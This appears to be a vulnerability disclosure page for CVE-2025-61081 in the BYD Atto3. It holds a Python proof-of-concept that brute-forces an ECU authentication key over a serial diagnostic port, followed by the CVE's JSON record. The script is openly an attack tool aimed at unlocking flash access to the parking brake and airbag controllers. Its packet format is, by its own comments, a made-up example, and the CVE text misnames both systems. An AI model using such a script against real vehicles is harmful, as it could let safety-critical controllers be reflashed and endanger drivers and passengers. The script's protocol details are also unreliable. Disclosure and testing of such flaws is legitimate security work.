CVE-2025-61081

#!/usr/bin/env python3 # PoC for CVE-2025-61081: Brute Force Auth Key on BYD Atto3 # This script simulates the brute force process against the ECU interface. import serial import time def brute_force_ecu(port='/dev/ttyUSB0', baud_rate=115200): """ Attempts to brute force the authentication key. Note: Actual protocol implementation may vary. """ try: # Connect to the vehicle's diagnostic interface ser = serial.Serial(port, baud_rate, timeout=1) print(f"[+] Connected to {port} at {baud_rate} baud.") # Simulating key space (e.g., 16-bit or 32-bit integer range) # In a real scenario, this depends on the specific key format. for key in range(0, 100000): # Construct the authentication request packet # Format example: "AUTH_KEY <value>" payload = f"AUTH_KEY {key}\n".encode('utf-8') ser.write(payload) response = ser.readline().decode('utf-8').strip() # Check for successful authentication response if "ACCESS_GRANTED" in response or "OK" in response: print(f"[!] SUCCESS: Valid Key Found -> {key}") print(f"[!] Flash access enabled for EPB and SRS ECUs.") return key # Simple progress indicator if key % 1000 == 0: print(f"[*] Testing key: {key}") # Optional: Small delay to prevent bus flooding time.sleep(0.01) except serial.SerialException as e: print(f"[-] Serial Error: {e}") except KeyboardInterrupt: print("\n[-] Attack stopped by user.") finally: if 'ser' in locals() and ser.is_open: ser.close() print("[+] Connection closed.") if __name__ == "__main__": print("Starting CVE-2025-61081 PoC...") brute_force_ecu()

{"cve": {"id": "CVE-2025-61081", "sourceIdentifier": "[email protected]", "published": "2026-05-19T18:16:19.767", "lastModified": "2026-05-19T21:05:49.167", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "In BYD Atto3, an attacker can obtain an authentication key through Brute Force attack, which is permanently available. The authentication key enables flash to the Electronic Parking Break (EPB) and Supplemental Restoration System (SRS) related ECUs."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "PHYSICAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.9, "impactScore": 6.0}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-307"}]}], "references": [{"url": "https://www.notion.so/BYD-Atto3-26215fb6156c8000b338db3c2011f637?source=copy_link", "source": "[email protected]"}, {"url": "https://www.notion.so/CVE-2025-61081-26215fb6156c8000b338db3c2011f637", "source": "[email protected]"}, {"url": "https://www.notion.so/BYD-Atto3-26215fb6156c8000b338db3c2011f637?source=copy_link", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}, {"url": "https://www.notion.so/CVE-2025-61081-26215fb6156c8000b338db3c2011f637", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}